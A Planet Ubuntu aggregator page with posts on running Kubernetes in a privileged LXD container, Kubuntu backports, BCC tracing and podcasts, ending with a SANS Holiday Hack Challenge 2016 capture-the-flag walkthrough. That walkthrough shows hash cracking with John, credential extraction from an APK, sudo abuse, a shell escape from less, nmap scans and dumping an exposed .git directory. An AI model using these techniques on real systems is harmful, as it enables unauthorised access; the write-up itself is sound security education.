Feed aggregator

Stéphane Graber: Running Kubernetes inside LXD

Planet Ubuntu - Fri, 01/13/2017 - 03:35

Introduction

For those who haven’t heard of Kubernetes before, it’s defined by the upstream project as:

Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.

It groups containers that make up an application into logical units for easy management and discovery. Kubernetes builds upon 15 years of experience of running production workloads at Google, combined with best-of-breed ideas and practices from the community.

It is important to note the “applications” part in there. Kubernetes deploys a set of single application containers and connects them together. Those containers will typically run a single process and so are very different from the full system containers that LXD itself provides.

This blog post will be very similar to one I published last year on running OpenStack inside a LXD container. Similarly to the OpenStack deployment, we’ll be using conjure-up to setup a number of LXD containers and eventually run the Docker containers that are used by Kubernetes.

Requirements

This post assumes you’ve got a working LXD setup, providing containers with network access and that you have at least 10GB of space for the containers to use and at least 4GB of RAM.

Outside of configuring LXD itself, you will also need to bump some kernel limits with the following commands:

sudo sysctl fs.inotify.max_user_instances=1048576   sudo sysctl fs.inotify.max_queued_events=1048576   sudo sysctl fs.inotify.max_user_watches=1048576   sudo sysctl vm.max_map_count=262144 Setting up the container

Similarly to OpenStack, the conjure-up deployed version of Kubernetes expects a lot more privileges and resource access than LXD would typically provide. As a result, we have to create a privileged container, with nesting enabled and with AppArmor disabled.

This means that not very much of LXD’s security features will still be in effect on this container. Depending on how you feel about this, you may choose to run this on a different machine.

Note that all of this however remains better than instructions that would have you install everything directly on your host machine. If only by making it very easy to remove it all in the end.

lxc launch ubuntu:16.04 kubernetes -c security.privileged=true -c security.nesting=true -c linux.kernel_modules=ip_tables,ip6_tables,netlink_diag,nf_nat,overlay -c raw.lxc=lxc.aa_profile=unconfined lxc config device add kubernetes mem unix-char path=/dev/mem

Then we need to add a couple of PPAs and install conjure-up, the deployment tool we’ll use to get Kubernetes going.

lxc exec kubernetes -- apt-add-repository ppa:conjure-up/next -y lxc exec kubernetes -- apt-add-repository ppa:juju/stable -y lxc exec kubernetes -- apt update lxc exec kubernetes -- apt dist-upgrade -y lxc exec kubernetes -- apt install conjure-up -y

And the last setup step is to configure LXD networking inside the container.
Answer with the default for all questions, except for:

  • Use the “dir” storage backend (“zfs” doesn’t work in a nested container)
  • Do NOT configure IPv6 networking (conjure-up/juju don’t play well with it)
lxc exec kubernetes -- lxd init

And that’s it for the container configuration itself, now we can deploy Kubernetes!

Deploying Kubernetes with conjure-up

As mentioned earlier, we’ll be using conjure-up to deploy Kubernetes.
This is a nice, user friendly, tool that interfaces with Juju to deploy complex services.

Start it with:

lxc exec kubernetes -- sudo -u ubuntu -i conjure-up
  • Select “Kubernetes Core”
  • Then select “localhost” as the deployment target (uses LXD)
  • And hit “Deploy all remaining applications”

This will now deploy Kubernetes. The whole process can take well over an hour depending on what kind of machine you’re running this on. You’ll see all services getting a container allocated, then getting deployed and finally interconnected.

Once the deployment is done, a few post-install steps will appear. This will import some initial images, setup SSH authentication, configure networking and finally giving you the IP address of the dashboard.

Interact with your new Kubernetes

We can ask juju to deploy a new kubernetes workload, in this case 5 instances of “microbot”:

ubuntu@kubernetes:~$ juju run-action kubernetes-worker/0 microbot replicas=5 Action queued with id: 1d1e2997-5238-4b86-873c-ad79660db43f

You can then grab the service address from the Juju action output:

ubuntu@kubernetes:~$ juju show-action-output 1d1e2997-5238-4b86-873c-ad79660db43f results: address: microbot.10.97.218.226.xip.io status: completed timing: completed: 2017-01-13 10:26:14 +0000 UTC enqueued: 2017-01-13 10:26:11 +0000 UTC started: 2017-01-13 10:26:12 +0000 UTC

Now actually using the Kubernetes tools, we can check the state of our new pods:

ubuntu@kubernetes:~$ ./kubectl get pods NAME READY STATUS RESTARTS AGE default-http-backend-w9nr3 1/1 Running 0 21m microbot-1855935831-cn4bs 0/1 ContainerCreating 0 18s microbot-1855935831-dh70k 0/1 ContainerCreating 0 18s microbot-1855935831-fqwjp 0/1 ContainerCreating 0 18s microbot-1855935831-ksmmp 0/1 ContainerCreating 0 18s microbot-1855935831-mfvst 1/1 Running 0 18s nginx-ingress-controller-bj5gh 1/1 Running 0 21m

After a little while, you’ll see everything’s running:

ubuntu@kubernetes:~$ ./kubectl get pods NAME READY STATUS RESTARTS AGE default-http-backend-w9nr3 1/1 Running 0 23m microbot-1855935831-cn4bs 1/1 Running 0 2m microbot-1855935831-dh70k 1/1 Running 0 2m microbot-1855935831-fqwjp 1/1 Running 0 2m microbot-1855935831-ksmmp 1/1 Running 0 2m microbot-1855935831-mfvst 1/1 Running 0 2m nginx-ingress-controller-bj5gh 1/1 Running 0 23m

At which point, you can hit the service URL with:

ubuntu@kubernetes:~$ curl -s http://microbot.10.97.218.226.xip.io | grep hostname <p class="centered">Container hostname: microbot-1855935831-fqwjp</p>

Running this multiple times will show you different container hostnames as you get load balanced between one of those 5 new instances.

Conclusion

Similar to OpenStack, conjure-up combined with LXD makes it very easy to deploy rather complex big software, very easily and in a very self-contained way.

This isn’t the kind of setup you’d want to run in a production environment, but it’s great for developers, demos and whoever wants to try those technologies without investing into hardware.

Extra information

The conjure-up website can be found at: http://conjure-up.io
The Juju website can be found at: http://www.ubuntu.com/cloud/juju

The main LXD website is at: https://linuxcontainers.org/lxd
Development happens on Github at: https://github.com/lxc/lxd
Mailing-list support happens on: https://lists.linuxcontainers.org
IRC support happens in: #lxcontainers on irc.freenode.net
Try LXD online: https://linuxcontainers.org/lxd/try-it

Jorge Castro: Fresh Kubernetes documentation available now

Planet Ubuntu - Tue, 01/10/2017 - 12:34

Over the past few months our team has been working real hard on the Canonical Distribution of Kubernetes. This is a pure-upstream distribution of k8s with our community’s operational expertise bundled in.

It means that we can use one set of operational code to get the same deployment on GCE, AWS, Azure, Joyent, OpenStack, and Bare Metal.

Like most young distributed systems, Kubernetes isn’t exactly famous for it’s ease of use, though there has been tremendous progress over the past 12 months. Our documentation on Kubernetes was nearly non-existent and it became obvious that we had to dive in there and bust it out. I’ve spent some time fixing it up and it’s been recently merged. 

You can find the Official Ubuntu Guides in the “Create a cluster” section. We’re taking what I call a “sig-cluster-lifecycle” approach to this documentation – the pages are organized into lifecycle topics based on what an operator would do. So “Backups”, or “Upgrades” instead one big page with sections. This will allow us to grow each section based on the expertise we learn on k8s for that given task. 

Over the past few months (and hopefully for Kubernetes 1.6) we will slowly be phasing out the documentation on our individual charm and layer pages to reduce duplication and move to a pure upstream workflow. 

On behalf of our team we hope you enjoy Kubernetes, and if you’re running into issues please let us know or you can find us in the Kubernetes slack channels.

The Fridge: Ubuntu Weekly Newsletter Issue 494

Planet Ubuntu - Tue, 01/10/2017 - 09:06

Welcome to the Ubuntu Weekly Newsletter. This is issue #494 for the week January 2 – 8, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

Ubuntu Weekly Newsletter Issue 494

The Fridge - Tue, 01/10/2017 - 09:06

Welcome to the Ubuntu Weekly Newsletter. This is issue #494 for the week January 2 – 8, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

Kubuntu General News: Plasma 5.8.4 and KDE Frameworks 5.8.0 now available in Backports for Kubuntu 16.04 and 16.10

Planet Ubuntu - Mon, 01/09/2017 - 13:01

The Kubuntu Team announces the availability of Plasma 5.8.4 and KDE Frameworks 5.8.0 on Kubuntu 16.04 (Xenial) and 16.10 (Yakkety) though our Backports PPA.

Plasma 5.8.4 Announcement:
https://www.kde.org/announcements/plasma-5.8.4.php
How to get the update (in the commandline):

  1. sudo apt-add-repository ppa:kubuntu-ppa/backports
  2. sudo apt update
  3. sudo apt full-upgrade -y

If you have been testing this upgrade by using the backports-landing PPA, please remove it first before doing the upgrade to backports. Do this in the commandline:

sudo apt-add-repository --remove ppa:kubuntu-ppa/backports-landing

Please report any bugs you find on Launchpad (for packaging problems) and http://bugs.kde.org for bugs in KDE software.

Leo Arias: Call for testing: IPFS

Planet Ubuntu - Fri, 01/06/2017 - 08:58

Happy new year Ubunteros and Ubunteras!

If you have been following our testing days, you will know by now that our intention is to get more people contributing to Ubuntu and free software projects, and to help them getting started through testing and related tasks. So, we will be making frequent calls for testing where you can contribute and learn. Educational AND fun ^_^

To start the year, I would like to invite you to test the IPFS candidate snap. IPFS is a really interesting free project for distributed storage. You can read more about it and watch a demo in the IPFS website.

We have pushed a nice snap with their latest stable version to the candidate channel in the store. But before we publish it to the stable channel we would like to get more people testing it.

You can get a clean and safe environment to test following some of the guides you'll find on the summaries of the past testing days.

Or, if you want to use your current system, you can just do:

$ sudo snap install ipfs --candidate

I have written a gist with a simple guide to get started testing it

If you finish that successfully and still have more time, or are curious about ipfs, please continue with an exploratory testing session. The idea here is just to execute random commands, try unusual inputs and just play around.

You can get ideas from the IPFS docs.

When you are done, please send me an email with your results and any comments. And if you get stuck or have any kind of question, please don't hesitate to ask. Remember that we welcome everybody.

Colin King: BCC: a powerful front end to extended Berkeley Packet Filters

Planet Ubuntu - Thu, 01/05/2017 - 08:21
The BPF Compiler Collection (BCC) is a toolkit for building kernel tracing tools that leverage the functionality provided by the Linux extended Berkeley Packet Filters (BPF).

BCC allows one to write BPF programs with front-ends in Python or Lua with kernel instrumentation written in C.  The instrumentation code is built into sandboxed eBPF byte code and is executed in the kernel.

The BCC github project README file provides an excellent overview and description of BCC and the various available BCC tools.  Building BCC from scratch can be a bit time consuming, however,  the good news is that the BCC tools are now available as a snap and so BCC can be quickly and easily installed just using:

sudo snap install --devmode bcc

There are currently over 50 BCC tools in the snap, so let's have a quick look at a few:

cachetop allows one to view the top page cache hit/miss statistics. To run this use:

sudo bcc.cachetop



The funccount tool allows one to count the number of times specific functions get called.  For example, to see how many kernel functions with the name starting with "do_" get called per second one can use:

sudo bcc.funccount "do_*" -i 1


To see how to use all the options in this tool, use the -h option:

sudo bcc.funccount -h

I've found the funccount tool to be especially useful to check on kernel activity by checking on hits on specific function names.

The slabratetop tool is useful to see the active kernel SLAB/SLUB memory allocation rates:

sudo bcc.slabratetop


If you want to see which process is opening specific files, one can snoop on open system calls use the opensnoop tool:

sudo bcc.opensnoop -T


Hopefully this will give you a taste of the useful tools that are available in BCC (I have barely scratched the surface in this article).  I recommend installing the snap and giving it a try.

As it stands,BCC provides a useful mechanism to develop BPF tracing tools and I look forward to regularly updating the BCC snap as more tools are added to BCC. Kudos to Brendan Gregg for BCC!

Kubuntu Podcast News: Kubuntu-Podcast #15 – Yakkety and Kubuntu Ninjas

Planet Ubuntu - Thu, 01/05/2017 - 01:21

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links
  OGG
  MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing ?

  • Aaron
    • Kicking Rick’s merges to the curb
    • Kubuntu Manual / Documentation
  • Rick
    • Kubuntu Party
    • Kubuntu Dojo
    • Kubuntu Manual / Documentation
  • Ovidiu
    • Projects
    • Dockerising Open Source Applications (ReviewBoard, AgileFant, FixMyStreet)
    • Adding Images to Feedburner
      Sponsor: Big Blue Button

Those of you that have attended the Kubuntu parties, will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org go check out their project.

Kubuntu News Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus Sponsor: Linode


Linode, an awesome VPS with super fast SSD’s, Data connections, and top notch support. We have worked out a sponsorship for a server to build packages quicker and get to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback
  • Linode Server – 1 x LXD Containers for other to use
    • 1 Container being used by one of the packagers
    • 2 A KCI Slave node
    • With this resource we can build one tree level dependency at once, which is around 100 packages, which takes around 1 hr on average.
    • There is also enough capacity left that we can provide additional containers for Ninja’s to use packaging.
  • For Yakkety, we now have QT 5.6.1, and we got Frameworks and Plasma 5.7.2 and for applications 16.04.3 almost done for Yakkety, and were looking for testers. The team are looking forward to applications 16.08, just hoping for an upstream release to get the PIM packages.
  • For Xenial Plasma 5.7.2 has move a little further forward, but there is much to be done in backports to achieve this.
  • Kubuntu CI System – Yofel has been working hard on improving the CI system, in addition to adding Slave Nodes, thanks to Linode too.
    • The next stage was to get the Build jobs in order, this has meant we have dropped 32bit builds from the CI, but we’ll continue to provide x86 32bit builds of Kubuntu.Focusing on only 64bit builds has resolved many of errors and fails.
    • They did run into an interesting error, where the Linode slave was so powerful it tried to open 20 concurrent connections to the KDE Git repo, and was promptly closed off by the 5 connection limit. A nice problem to have.
  • Yofel will continue to work on the Stable CI builds, by getting a set of working configurations. The move back to Launchpad brings many benefits but right now its created a lot of challenges, that the team are working through.
  • 2 additional Ninja’s have been added to the Team:
    • Rik Mills
    • Simon Quigly
  • Clivejo put a big shout out to the 2 new Ninja’s, many thanks for excellent work and effort.
  • As always we’re desperate for daily build and beta builds of Yakkety
  • Bug Crush Sprint required http://qa.kubuntu.co.uk/
In Show Notes

Rick doing GOOD STUFF: http://picosong.com/Dk8m/

Outro

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

Kubuntu Podcast News: Kubuntu Podcast 17

Planet Ubuntu - Thu, 01/05/2017 - 01:02

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links

OGG

MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing ?

  • Aaron
    • Getting ready for Hurricane Matt in Florida
  • Rick
    • ???
  • Ovidiu
    • ???
Sponsor: Big Blue Button

Those of you that have attended the Kubuntu parties, will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org go check out their project.

Kubuntu News Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus Sponsor: Linode

Linode, an awesome VPS with super fast SSD’s, Data connections, and top notch support. We have worked out a sponsorship for a server to build packages quicker and get to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback
  • Clive became a Kubuntu Developer!!!
Game On 
  • The Linux Gamer interview

Questions about Gaming on Linux:

  1. Who are you and what do you do?
  2. What makes a Game developer want to bring their AAA game to Linux?
  3. Has stores like Humble Bundle, Indie Gala helped Linux gaming?
  4. Are Linux graphics drivers getting better?
  5. What are your thoughts on Vulkan?

TLG YouTube: https://www.youtube.com/user/tuxreviews

TLG Patreon: https://www.patreon.com/thelinuxgamer

Listener Feedback
  • From: Snowhog @ https://www.kubuntuforums.net/

    I just want to express my thanks for all the hard work developers and testers put into the Kubuntu/KDE/Plasma projects. So few of you; so many of us, and the “us’s” always seem to want ‘more’, and tend to, more often than not, complain about what isn’t included and what isn’t working instead of praising that which is and does.

    For me, and with very few exceptions since I first started using Kubuntu in 2007, Kubuntu has simply just worked. I am constantly amazed that such a robust and feature filled operating system is available to everyone for free (free to me). The developers and testers simply don’t receive the credit and gratitude you all have earned.

    So, again, from one of the “us’s”, THANK YOU!

    Please feel free to pass this along.
Contact Us

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

David Tomaschik: SANS Holiday Hack Challenge 2016

Planet Ubuntu - Thu, 01/05/2017 - 01:00
Introduction

This is my second time playing the SANS holiday hack challenge. It was a lot of fun, and probably took me about 8-10 hours over a period of 2-3 days, not including this writeup. Ironically, this writeup took me longer than actually completing the challenge – which brings me to a note about some of the examples in the writeup. Please ignore any dates or timelines you might see in screengrabs and other notes – I was so engrossed in playing that I did a terrible job of documenting as I went along, so a lot of these I went back and did a 2nd time (of course, knowing the solution made it a bit easier) so I could provide the quality of writeup I was hoping to.

Most importantly, a huge shout out to all the SANS Counter Hack guys – I can only imagine how much work goes into building an educational game like this and making the challenges realistic and engrossing. I’ve built wargames & similar apps for work, but never had to build them into a story – let across a story that spans multiple years. I tip my hat to their dedication and success!

Part 1: A Most Curious Business Card

We start with the Dosis children again (I can’t read that name without thinking about DOCSIS, but I see no cable modems here…) who have found Santa’s bag and business card, signs of a struggle, but no Santa!

Looking at the business card, we see that Santa seems to be into extensive social media use. On his twitter account, we see a large number of posts (350), mostly composed of Christmas-themed words (JOY, PEACEONEARTH, etc.), but occasionally with a number of symbols in the center. At first I thought it might be some kind of encoding, so I decided to download the tweets to a file and examine them as plaintext. I did this with a bit of javascript to pull the right elements into a single file. I was about to start trying various decoding techniques when I happened to notice a pattern:

Well, perhaps the hidden message is “BUG BOUNTY”. (Question #1) (Image wrapped for readability.) I’m not sure what to do with it at this point, but perhaps it will become clear later.

Let’s switch to instagram and take a look there. The first two photos appear unremarkable, but the third one is cluttered with potential clues. One of Santa’s elves (Hermey) is apparently as good at keeping a clean desk as I am – just ask my coworkers! Fortunately they don’t Instagram shame me. :)

Using our “enhance” button from the local crime-solving TV show, we find a couple of clues.

We have a domain (or at least part of one) from an nmap report, and a filename. I wonder if they go together: https://www.northpolewonderland.com/SantaGram_4.2.zip. Indeed they do, and we have a zip file. Unzipping it, we discover it’s encrypted. Unsure what else to try, I try variations of “BUG BOUNTY” from Twitter, and it works for me. (Turns out the password is lower case, though.) Inside the zip file, we find an APK for SantaGram with SHA-1 78f950e8553765d4ccb39c30df7c437ac651d0d3. (Question #2)

Part 2: Awesome Package Konveyance

With APK in hand, we decide to start hunting for interesting artifacts inside. With a simple apktool d, we extract all the files inside, resulting in resources, smali code, and a handful of other files. Hunting for usernames and passwords, I decide to use ack (http://beyondgrep.com/), a grep-like tool with some enhanced features. A quick search with the strings username and password reveal a number of potential options. I could check manually, but well, I’m lazy. Instead, I use ack -A 5, which shows 5 lines of context after each match. Paging through these results, I spot a likely candidate:

Inside this same smali file, I find a password a few lines further down:

1 2 3 4 5 6:try_start_0 const-string v1, "username" const-string v2, "guest" invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject; const-string v1, "password" const-string v2, "busyreindeer78"

Now we have a username and password pair: guest:busyreindeer78. (Question #3) Cool. I don’t know what they’re good for, but collecting credentials can always come in handy later.

An audio file is mentioned. I don’t know if it’s embedded in source, a resource by itself, or what, but I’m going to take a guess that it’s a large file. Find is useful in these cases:

1 2 3 4 5 6 7 8 9 10 11 12 13% find . -size +100k ./smali/android/support/v7/widget/StaggeredGridLayoutManager.smali ./smali/android/support/v7/widget/ao.smali ./smali/android/support/v7/widget/Toolbar.smali ./smali/android/support/v7/widget/LinearLayoutManager.smali ./smali/android/support/v7/a/l.smali ./smali/android/support/v4/b/s.smali ./smali/android/support/v4/widget/NestedScrollView.smali ./smali/android/support/design/widget/CoordinatorLayout.smali ./smali/com/parse/ParseObject.smali ./res/drawable/launch_screen.png ./res/drawable/demo_img.jpg ./res/raw/discombobulatedaudio1.mp3

There are quite a few more files than I expected in the relevant size range, but it’s easy to find the MP3 file in the bunch with just a glance. I guess the name of the audio file is discombobulatedaudio1.mp3. (Question #4.)

Part 3: A Fresh-Baked Holiday Pi

After running around for a while, hunting for pieces of the Cranberry Pi, I’m able to put the pieces together, and the helpful Holly Evergreen provides a link to the Cranberry Pi image.

After downloading the image, I’m able to map the partitions (using a great tool named kpartx) and mount the filesystem, then extract the password hash.

1 2 3 4 5 6% sudo kpartx -av ./cranbian-jessie.img add map loop3p1 (254:7): 0 129024 linear 7:3 8192 add map loop3p2 (254:8): 0 2576384 linear 7:3 137216 % sudo mount /dev/mapper/loop3p2 data % sudo grep cranpi data/etc/shadow cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

This is a standard Unix sha-512 hash – slow, but workable. Fortunately, Minty Candycane of Rudolph’s Red Team has helped us out there by pointing to John the Ripper and the RockYou password list. (Shout out to @iagox86 for hosting the best collection of password lists around.)

Throwing the hash up on a virtual machine with a few cores and running john with the rockyou list for a little while, we discover Santa’s top secret password: yummycookies. (Question #5) After we let Holly Evergreen know that we’ve found the password, she tells us that we’ll be able to use the terminals around the North Pole to unlock the doors. Time to head to the terminals.

Terminal: Elf House #2

The first door I ran to is Elf house #2. Opening the terminal, we’re told to find the password in the /out.pcap file, but we’re running as the user scratchy, and the user itchy owns the file. After spending some time over-thinking the problem, I run sudo -l to see if I can run anything as root or itchy and discover some various useful tools:

1 2(itchy) NOPASSWD: /usr/sbin/tcpdump (itchy) NOPASSWD: /usr/bin/strings

Like any good hacker, I go straight to strings and discover the first part of the password:

1 2 3 4sudo -u itchy /usr/bin/strings /out.pcap … <input type="hidden" name="part1" value="santasli" /> …

I played around with tcpdump to try to extract the second part as a file, but could never get anything I was able to reconstruct into anything meaningful. I thought about trying to exfiltrate the file to my local box for wireshark, but I decided I wanted to push to solve it only with the tools I had available to me. I look at my options with tcpdump and try the -A flag (giving ASCII output) to see what I can see. Paging through it, I noticed an area where I saw the string “part2”, but only in every-other character. I gave strings another try, this time checking for little-endian UTF-16 characters:

1 2sudo -u itchy /usr/bin/strings -e l /out.pcap part2:ttlehelper

Putting the parts together, we have “santaslittlehelper” and we’re in!

Terminal: Workshop

The first of two doors in the workshop is up the candy-cane striped stairs.

The challenge here is simple, find the password in the deeply nested directory structure. I decided to see what files existed at all with a quick find:

1 2 3 4 5$ find . -type f ./.bashrc ./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt ./.profile ./.bash_logout

That was easy, but I suppose we need the contents. I don’t want to deal with all the special characters and directories (remember, I’m lazy) so I just let find do the work for me:

1 2$ find . -type f -name 'key*' -exec cat {} \; key: open_sesame

This leads us into Santa’s office, which presents us with another terminal on the back wall.

Terminal: Santa’s Office

As I said, we’re in Santa’s office with another terminal on the back wall, but no obvious door. It turns out the bookcase there is the hidden door!

Getting back to the terminal, I’m prompted with GREETINGS PROFESSOR FALKEN. Immediately, I recognize this as a line from the WOPR in the movie WarGames. After a few errant entries, I realize it wants me to dialog with it in exactly the same way as the movie. (This was a painstaking exercise in transcribing YouTube.)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33GREETINGS PROFESSOR FALKEN. Hello. HOW ARE YOU FEELING TODAY? I'm fine. How are you? EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73? People sometimes make mistakes. YES THEY DO. SHALL WE PLAY A GAME? Love to. How about Global Thermonuclear War? WOULDN'T YOU PREFER A GOOD GAME OF CHESS? Later. Let's play Global Thermonuclear War. FINE ,------~~v,_ _ _--^\ |' \ ,__/ || _/ /,_ _ / \,/ / ,, _,,/^ v v-___ | / |'~^ \ \ | _/ _ _/^ \ / / ,~~^/ | ^~~_ _ _ / | __,, _v__\ \/ '~~, , ~ \ \ ^~ / ~ // \/ \/ \~, ,/ ~~ UNITED STATES SOVIET UNION WHICH SIDE DO YOU WANT? 1. UNITED STATES 2. SOVIET UNION PLEASE CHOOSE ONE: 2 AWAITING FIRST STRIKE COMMAND ----------------------------- PLEASE LIST PRIMARY TARGETS BY CITY AND/OR COUNTRY NAME: Las Vegas LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: LOOK AT THE PRETTY LIGHTS

That was painful, but not difficult. It was incredibly unforgiving when it comes to typos, even a single space would require retyping the sentence (though fortunately not the whole transaction).

Through the door, we find ourselves in “The Corridor” with another locked door, but this time, no terminal. I tried a few obvious passwords anyway, but had no luck with that.

Terminal: Workshop (Reindeer)

There’s a second door in the workshop, next to a few of Santa’s reindeer. (If anyone figures out whether reindeer really moo, please let me know…)

Find the passphrase from the wumpus. Play fair or cheat; it's up to you.

I was going to cheat, but first I wanted to get the lay of the game, so I wandered a bit and fired a few arrows, and happened to hit the wumpus – no cheating necessary! (I’m not sure if randomly playing is “playing fair”, but hacking is about what works!)

1 2 3 4 5 6 7 8 9Move or shoot? (m-s) s 6 *thwock!* *groan* *crash* A horrible roar fills the cave, and you realize, with a smile, that you have slain the evil Wumpus and won the game! You don't want to tarry for long, however, because not only is the Wumpus famous, but the stench of dead Wumpus is also quite well known, a stench plenty enough to slay the mightiest adventurer at a single whiff!! Passphrase: WUMPUS IS MISUNDERSTOOD Terminal: Workshop - Train Station

On the train, there’s another terminal. It proclaims to be the Train Management Console: AUTHORIZED USERS ONLY. Running a few commands, I soon discovered that BRAKEOFF works, but START requires a password which I don’t have. Looking at the HELP documentation, I noticed something odd:

1 2 3 4 5 6Help Document for the Train **STATUS** option will show you the current state of the train (brakes, boiler, boiler temp, coal level) **BRAKEON** option enables the brakes. Brakes should be enabled at every stop and while the train is not in use. **BRAKEOFF** option disables the brakes. Brakes must be disabled before the **START** command will execute. **START** option will start the train if the brake is released and the user has the correct password. **HELP** brings you to this file. If it's not here, this console cannot do it, unLESS you know something I don't.

It seemed strange that unLESS had the unusual capitalization, but then I realized the help document was probably being displayed with GNU less. Did that have a shell functionality, similar to vim or editors? The more-or-less universal command to start a shell is a bang (!), so I decided to give it a try, and was out into a shell. At first I thought about looking for the password (and you can discover it), but then I realized I could just run ActivateTrain directly.

It turns out the train is a time machine to 1978. (I wonder if that’s related to the guest password we found earlier – busyreindeer78. Guess we’ll find out soon.)

1978: Finding Santa

So I arrived in 1978 and quite frankly, had no idea what I should do. I still needed more NetWars challenge coins (man, what I wouldn’t give for a real-life NetWars challenge coin, but since I’ve never been to a NetWars event, my trophy case remains empty), so I decided to wander and find whatever I found. Guess what I found? Santa! He was in the DFER (Dungeon for Errant Reindeer), but could not remember how he got there.

Part 4: My Gosh… It’s Full of Holes

If we use ack again to find URLs containing “northpolewonderland.com” (which was just a bit of a guess from seeing one or two of these URLs when looking for credentails), we find a number of candidate URLs:

1 2 3 4 5 6 7 8% ack -o "[a-z]+\.northpolewonderland\.com" values/strings.xml 24:analytics.northpolewonderland.com 25:analytics.northpolewonderland.com 29:ads.northpolewonderland.com 32:dev.northpolewonderland.com 34:dungeon.northpolewonderland.com 35:ex.northpolewonderland.com

We can then retrieve the IP addresses for each of these hosts using our trust DNS tool dig:

1 2 3 4 5 6% dig +short {ads,analytics,dev,dungeon,ex}.northpolewonderland.com 104.198.221.240 104.198.252.157 35.184.63.245 35.184.47.139 104.154.196.33

Taking each of these IPs to our trusty Tom Hessman, we find that each of these IPs in in scope for our testing, but are advised to keep our traffic reasonable.

analytics.northpolewonderland.com

I started by doing a quick NMAP scan of the host – it’s good to know what’s running on a machine, and sometimes you can reveal some interesting info with the default set of scripts. In fact, that turned out to be extremely handy in this particular case:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27% nmap -F -sC analytics.northpolewonderland.com Starting Nmap 7.31 ( https://nmap.org ) Nmap scan report for analytics.northpolewonderland.com (104.198.252.157) Host is up (0.065s latency). rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com Not shown: 98 filtered ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA) | 2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA) |_ 256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA) 443/tcp open https | http-git: | 104.198.252.157:443/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Finishing touches (style, css, etc) | http-title: Sprusage Usage Reporter! |_Requested resource was login.php | ssl-cert: Subject: commonName=analytics.northpolewonderland.com | Subject Alternative Name: DNS:analytics.northpolewonderland.com | Not valid before: 2016-12-07T17:35:00 |_Not valid after: 2017-03-07T17:35:00 |_ssl-date: TLS randomness does not represent time | tls-nextprotoneg: |_ http/1.1

You’ll notice that the nmap http-git script was successful in this case. This is a not-uncommon finding when developers use git to deploy an application directly to the document root (very common in the case of PHP applications, which is likely the case here due to the redirect to ‘login.php’). This is great, because we can download the entire git repository, which will allow us to look for secrets, credentials, hidden handlers, or at least better understand the application.

Now, it’s not possible to directly clone this over http because nobody ran git update-server-info, as they weren’t intending to share this over the network. But that’s okay with directory indexing enabled: we can just mirror all the files with wget, then clone out a working repository:

1 2 3 4 5 6% wget --mirror https://analytics.northpolewonderland.com/.git … Downloaded: 314 files, 1003K in 0.4s (2.68 MB/s) % git clone analytics.northpolewonderland.com/.git analytics Cloning into 'analytics'... done.

